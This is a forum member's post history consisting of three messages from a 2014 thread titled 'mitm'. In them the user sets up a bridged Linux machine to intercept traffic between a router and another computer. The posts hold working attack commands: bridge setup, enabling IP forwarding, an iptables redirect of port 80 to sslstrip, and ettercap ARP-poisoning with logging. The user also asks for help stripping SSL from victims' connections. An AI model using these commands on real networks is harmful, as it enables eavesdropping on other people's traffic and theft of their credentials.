Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - SomeUser

Pages: [1]
1
Projects and Discussion / Re: mitm
« on: May 29, 2014, 09:28:29 pm »
Look smart!! I understand how and what works here! This example works with all open protocols(Problem was with another computer)! I need to make it work with SSL, explains how this type of attack is not necessary.!

2
Projects and Discussion / Re: mitm
« on: May 29, 2014, 03:30:41 pm »
ettercap -Tq -i bridge0 -M arp -L log // //


?

3
Projects and Discussion / mitm
« on: May 29, 2014, 09:21:41 am »
There is a computer with two interfaces I try to insert it in the middle of the line (try to implement MITM),
such as one interface it looks at the router and the other to look at another computer.

Code: [Select]
iptables --flush
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr bridge0
brctl addif bridge0 eth0
brctl addif bridge0 eth1
ifconfig bridge0 192.168.0.199 up

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i bridge0 -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
cd /pentest/web/sslstrip
perl sslstrip.py -l 8080

then I try to:
Code: [Select]
ettercap -Tq -i bridge0
But nothing happens(in the terminal where I ettercap run empty)
I need to implement prompt ARP spoofing or not? or not ..
because all traffic running through my bridge0 interface, I will be very grateful for the help.

Pages: [1]